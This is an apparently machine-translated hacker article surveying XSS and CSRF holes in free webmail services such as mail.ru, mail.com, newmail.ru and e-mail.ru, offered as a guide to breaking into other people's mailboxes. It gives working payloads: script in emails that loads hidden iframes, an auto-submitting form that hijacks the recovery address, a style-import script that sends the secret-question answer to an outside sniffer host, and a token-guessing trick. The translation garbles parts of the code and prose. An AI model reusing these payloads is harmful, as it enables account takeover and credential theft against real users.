This page has been robot translated, sorry for typos if any. Original content here.

ÜBERBLICK ÜBER DIE VULNERABILITÄT DER FREIEN POSTDIENSTLEISTUNGEN

Wir beschäftigen uns weiterhin mit Web-Mail. Ich führte eine kleine Studie von verschiedenen Dienstleistungen für Hacking und präsentieren Ihnen Ihre Aufmerksamkeit die Ergebnisse. Die Technologie des Angriffs bleibt die gleiche: ein Brief mit einem JavaScript-Code an jemand anderes Adresse gesendet wird gesendet, die funktioniert, wenn die Nachricht geöffnet wird, und ändert alle Informationen in der Benutzer-Box-Einstellungen. Es gibt keinen Sinn, jeden Server im Detail zu beschreiben, da der Ansatz überall gleich ist, also gebe ich einige Beispiele und am Ende - einen Tisch. In den meisten Fällen kann Hacking 100% betrachten, mit einigen Annahmen: Der Benutzer muss unbedingt das Web-Interface verwenden, um Briefe zu lesen, beim Schreiben von Exploits wurde ich von einer Standardplattform geführt, das heißt, ich nehme zunächst an, dass der Benutzer kein exotisches Betriebssystem hat oder Browser mit JS-Ausführung deaktiviert.

WWW.MAIL.RU

Ich fange mit der Nummer 1 in Russland an. Im Moment, durch das Überspringen von JavaScript und ein Entwicklerfehler, brechen diese Box kann getan werden. Ich glaube, dass die Grundprinzipien bekannt sind. Wie bekomme ich ein Passwort? 1 - um es unberechtigt zu ändern Gehen Sie nicht vor, Sie müssen die vorher etablierten kennen. 2 - um die geheime Frage zu ändern und den Dienst zu benutzen, um Amnesie zu bekämpfen. Auch wird nicht funktionieren 3 - richten Sie Ihre alternative E-Mail ein, um ein neues Passwort zu erhalten, das vom System generiert wird. Es funktioniert nicht, die letzten beiden oben aufgeführten Optionen sind in der gleichen Form und sind auch passwortgeschützt. Sogar der Rest, der für uns weniger Interesse (Name, Nachname, etc.) jetzt ohne Eingabe des aktuellen Passworts darstellt, kann sich nicht ändern. Es scheint, dass es keine Optionen gibt. Allerdings gibt es so einen sekundären, unauffälligen Abschnitt der Einstellungen "Kontaktinformationen" (ICQ, Website, Telefon, Arbeitsplatz, Zeitzone, etc.). In diesem Abschnitt können Sie auch eine Kontakt-E-Mail angeben. Der Trick ist, dass, während in der Registrierung Informationen die alternative Adresse ändert, aber das, was in den Fragebogen registriert ist, und jetzt können Sie ein Passwort für die Seife, mit dem Erinnerungsdienst. Es ist einfach URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Mit der GET-Methode können die Einstellungen in der Mail.ru-Box nicht geändert werden, deshalb werde ich die technische Seite der Frage ausführlich beschreiben.

I. Wir schicken einen Brief an die gewünschte Box mit einem Code, der einen Rahmen direkt im Körper der Nachricht mit einem Link zu unserer Website generiert. Wenn möglich, sollte das Skript ohne Benutzereingabe funktionieren (klicken, klicken, Maus überspringen, Bilder hochladen usw.):


 <Embed src = "javascript: document.getElementById ('xxx') InnerHTML = '<iframe src = http: //yoursite.yourdomain.com/yourscript.html> </ iframe>'; this.wav">
 <P id = 'xxx'>
Um die Funktionalität des Skripts vollständig zu sichern und zu verkleiden, konvertieren wir:
 <Embed src = "javascript: status = location; document.getElementById ('xxx') innerHTML = '<iframe src = http: //yoursite.com/yourscript.html width = 0 height = 0> </ iframe>' ; Diese.wav "width = 0 height = 0>
 <P id = 'xxx'>
In dieser Form ersetzen die Zeichencodes die Buchstaben im Namen des Javascript- und Iframe-Elements, und das Mail-Skript filtert sie nicht. Der Status = Ortslinie; Erstellt eine Sichtbarkeit der lokalen URL in der Statusleiste, so dass kein äußeres Flimmern Verdacht erweckt. Die Breiten- und Höhenattribute sowohl des Rahmens als auch des Einbaus werden auf Null gesetzt und machen sie unsichtbar.

II. Auf der Ressource http://yoursite.ru haben wir ein HTML-Dokument mit einem Formular für das Senden der geänderten Daten an den mail.ru Server.

Der Inhalt von yourscript.html:
 <Formular method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <Input type = "hidden" name = "page" value = "2"> <br>
 <Input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <Input type = "hidden" value = "Save" name = "Speichern"> <br>
 </ Form> <br>
 <Skript> <br>
 Document.anketa.submit ();
 </ Script>
Anmerkungen: Die Arbeit des Kunden Teil des Skripts in einer unveränderten Weise ist nur für IE garantiert; Die Form des Sendens wird auf einer separaten Seite gepostet, um den Brief zu entladen.


WWW.MAIL.COM

Jetzt ein etwas anderes Sicherheitsfehler, zum Beispiel http://mail.com. Wenn du den Passwort-Erinnerungsdienst benutzt hast, dann bekommst du einfach die richtige Antwort auf die geheime Frage (eine der Optionen). Daher haben wir uns die Aufgabe gestellt, diese Antwort zu erhalten. Dies geschieht leicht. Als ich in die Eigenschaften der Mailbox ging und durch die Registrierungsinformationen schaute, sah ich, dass die Antwort auf die geheime Frage nicht verborgen ist, was uns erlaubt, JavaScript zu verwenden, um seinen Wert zu berechnen.

Wir implementieren das Skript über das Style- Tag.
Adresse der Seite mit den Einstellungen: http://mail01.mail.com/scripts/common/genprofile.cgi
Formularname: Profilform
Der Name des Textfeldes mit einer geheimen Antwort: hint_a
Am Ende, um eine geheime Frage zu stehlen, musst du die Einstellungsseite aufrufen, Javascript ausführen, den Wert von document.profileform.hint_a.value erhalten und an den Sniffer zusammen mit der Umgebungsvariablen REQUEST_UR I weitergeben .

Fertigversion:
 <Style> @import url (javascript: document.getElementById ('out') innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `Str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; Document.zero.location = Pfad + str`> </ iframe>" ); </ Style>
 <Span id = 'out'> </ span>
Im generierten Rahmen mit dem Namen Null wird die Einstellungsseite geladen. Am Ende der Ladung startet der OnLoad-Handler das Skript zum Lesen der geheimen Frage und sendet dann durch denselben Rahmen eine Antwort auf den Sniffer. Jetzt ist es genug, um auf die Adresse http://zero.h12.ru/stat/log.php zu gehen und die notwendigen Informationen in der Zeile "Host" zu finden .

WWW.NEWMAIL.RU

Meiner Meinung nach ein ziemlich populärer Briefträger, also erzähle ich dir im Detail. Vor allem, weil es viel einfacher ist, den Besitz eines anderen zu nehmen, als es auf den ersten Blick scheint. Sie können dies tun: Senden Sie einen Brief mit einem Skript, das Session-ID beim Start erhalten wird, generieren Sie die erforderlichen Abfragen und ändern Sie die Einstellungen für die altrenrative E-Mail (auf die das Passwort nachträglich gesendet wird) und die geheime Frage und Antwort. Wenn Sie jedoch eine andere Adresse mit einer Erinnerung angeben, wird das Passwort an sie gesendet, wenn nur die geheime Antwort korrekt war. Und die folgende Beobachtung: Die Session-ID kann überhaupt nicht zum Ändern der Einstellungen verwendet werden. Außerdem sind alle Tags erlaubt. Alle oben genannten reduziert die Menge an Code auf ein paar Zeilen:
 <Iframe src = http: //newmail.ru/users/chpass.dhtml? Cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Die Methode des Hackens von e-mail.ru etwas passt nicht in das allgemeine Thema des Artikels, aber immer noch - mail :) . Als ich ein Passwort aus einer Box bekommen musste, registrierte ich mein Konto wie gewohnt und begann, das System zu untersuchen. Die erste Sache, die mein Auge fing, war die Fähigkeit, ein neues Passwort und eine geheime Frage mit einer Antwort zu setzen, ohne das alte Passwort einzugeben. Der Aktionsplan ist normal: Überprüfen Sie die Filterung von Tags, erhalten Sie die ID und führen Sie die Abfrage aus. Um jedoch die Einstellungen zu ändern, die eine spezielle Variable utoken verwendet, die im Textkörper enthalten ist. Nach dem Experimentieren mit dem Wechsel der Frage und der Antwort mit dem bisher bekannten utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ ich habe gekommen Die Schlussfolgerung, dass ID und Cookies zum Ändern der Einstellungen nicht erforderlich sind. Zur gleichen Zeit, nach der Überwachung utoken, wurde festgestellt, dass die vierstellige Hexadezimalzahl nach der E-Mail-Adresse email@e-mail.ru-5a00 liegt in einem sehr engen Bereich. Nämlich, um eine geheime Frage mit der Antwort auf jede Box von Interesse für uns zu etablieren, müssen Sie nur 7 Optionen durchlaufen : 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Wenn die Nummer erraten wird, werden wir in die gewünschte Box kommen.

Anmerkungen: Im Moment gab es einige Änderungen. Passwort Wiederherstellung Service funktioniert nicht, so ist es ratsam, es sofort zu ändern. Die Adresse der Konfigurationsänderung hat sich auch geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Die Methode funktioniert nicht für immer. Wahrscheinlich ist es trotzdem erforderlich, dass der Benutzer von Zeit zu Zeit in die Post über das Internet geht .

Tabelle mit Merkmalen von freien WWW-Servern

SERVER JavaScript VULNERABILITÄT
Wi
Km.ru
Img src = Javascript: Ermöglicht es Ihnen, das Passwort auf der Einstellungsseite aus dem Passwort zu lesen
Www.mail.ru
Inbox.ru , bk.ru , list.ru ,
Embed src = Javascript: Sie können eine alternative E-Mail ändern
Www.mail.com
Email.com , Post.com , myself.com , consultant.com und andere.
@ Import url (javascript :); Die Einstellungen zeigen die Antwort auf die Sicherheitsfrage
Http://www.newmail.ru
Nm.ru , hotmail.ru , orc.ru , nightmail.ru
In irgendeiner Weise Lesen und Ändern der Frage und Antwort. Das Passwort ist gültig
Www.netman.ru und www.mailgate.ru
Der gleiche mailer Über 80 Domains
Img src = Javascript :, Stil = Hintergrund: URL (Javascript :) Sie können eine Antwort auf eine Sicherheitsfrage stehlen, wenn sie installiert ist. Es ist auch möglich, die Adresse für die Weiterleitung einzustellen (Kopien werden nicht gespeichert)
Www.yandex.ru OnError, OnLoad Entfernen der Website * .narod.ru (JS ist nicht erforderlich)
Www.ukr.net Einbetten src = javasc
Ript: diese .wav>
Lesen Sie die Antwort auf Ihre Sicherheitsfrage
Www.nextmail.ru
Xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
Embed src = "Javascript: Ändern / stehlen Sie die Antwort auf Ihre Sicherheitsfrage
Www.hotbox.ru
Pochta.ru , pisem.net , fromru.com , land.ru und andere.
In vielerlei Hinsicht Konto löschen
Www.rin.ru Embed src = Javascript: Geheime Antwort lesen